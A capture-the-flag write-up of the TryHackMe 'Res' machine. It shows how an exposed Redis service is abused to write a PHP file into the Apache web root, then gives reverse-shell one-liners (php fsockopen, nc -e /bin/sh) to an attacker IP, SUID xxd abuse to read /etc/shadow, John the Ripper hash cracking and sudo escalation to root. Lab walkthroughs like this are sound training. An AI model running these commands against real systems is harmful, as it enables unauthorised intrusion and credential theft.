# TryHackMe-Res > Abdullah Rizwan | 12:00 AM | 4th November ,2020 ## NMAP Run the scan for all ports ``` Nmap scan report for 10.10.199.149 Host is up (0.17s latency). Not shown: 65533 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 6379/tcp open redis Redis key-value store 6.0.7 ``` ## PORT 6379 I used `https://book.hacktricks.xyz/pentesting/6379-pentesting-redis` to enumerate redis `nc 10.10.199.149 6379` Connect to the port using `netcat` and type `info` you'll get output like this Now we need to use redis-cli client to interact with it more so install using `apt-get install redis-tools` As you can see after installing the redis-cli we can interact with it Lets see if we can create a php page by changing directory to where apache fetches html pages and name the page to `redis.php` ``` 10.10.199.149:6379> config set dir /var/www/html OK 10.10.199.149:6379> config set dbfilename redis.php OK 10.10.199.149:6379> set test "" OK 10.10.199.149:6379> save OK ``` And it works so we can confirm that we can get a shell from this , now set a GET parameter that can inovoke system commands. ``` 10.10.199.149:6379> set test "" OK 10.10.199.149:6379> save OK 10.10.199.149:6379> ``` RCE exists so lets get a shell `php -r '$sock=fsockopen("10.14.3.143",6666);exec("/bin/sh -i <&3 >&3 2>&3");'` - Didn't worked `nc -e /bin/sh 10.14.3.143 6666` - Worked ! ### User Flag In `/home/vianka` We can find the user flag ### Root Flag Now for the root flag by looing for `SUID` we see that `xxd` has an suid bit set so it can run as root by anyone ``` www-data@ubuntu:/$ find / -perm /4000 2>/dev/null /bin/ping /bin/fusermount /bin/mount /bin/su /bin/ping6 /bin/umount /usr/bin/chfn /usr/bin/xxd /usr/bin/newgrp /usr/bin/sudo /usr/bin/passwd /usr/bin/gpasswd /usr/bin/chsh /usr/lib/eject/dmcrypt-get-device /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper www-data@ubuntu:/$ xxd /root/root.txt | xxd -r thm{xxd_pr1v_escalat1on} ``` ### Privilege Escalation We got the root flag without even being root but I love to find a way to get root so lets do that.We know that we can read almost anyting with `xxd` so lets try to read `/etc/shadow` and crack the user's hash `xxd /etc/shadow | xxd -r` `vianka:$6$2p.tSTds$qWQfsXwXOAxGJUBuq2RFXqlKiql3jxlwEWZP6CWXm7kIbzR6WzlxHR.UHmi.hc1/TuUOUBo/jWQaQtGSXwvri0:18507:0:99999:7:::` Run `johntheripper` on this hash ``` root@kali:~/TryHackMe/Easy/Res# john hash Using default input encoding: UTF-8 Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x]) Cost 1 (iteration count) is 5000 for all loaded hashes Will run 4 OpenMP threads Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, almost any other key for status Warning: Only 3 candidates buffered for the current salt, minimum 16 needed for performance. Warning: Only 7 candidates buffered for the current salt, minimum 16 needed for performance. Warning: Only 9 candidates buffered for the current salt, minimum 16 needed for performance. Warning: Only 7 candidates buffered for the current salt, minimum 16 needed for performance. Warning: Only 11 candidates buffered for the current salt, minimum 16 needed for performance. Warning: Only 8 candidates buffered for the current salt, minimum 16 needed for performance. Almost done: Processing the remaining buffered candidate passwords, if any. Warning: Only 6 candidates buffered for the current salt, minimum 16 needed for performance. Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist beautiful1 (vianka) 1g 0:00:00:04 DONE 2/3 (2020-11-04 01:25) 0.2183g/s 2533p/s 2533c/s 2533C/s maryjane1..cookies1 Use the "--show" option to display all of the cracked passwords reliably ``` Now login with `vinanka` ``` www-data@ubuntu:/$ su vianka Password: vianka@ubuntu:/$ sudo -l [sudo] password for vianka: Matching Defaults entries for vianka on ubuntu: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User vianka may run the following commands on ubuntu: (ALL : ALL) ALL vianka@ubuntu:/$ sudo bash root@ubuntu:/# ``` We are root !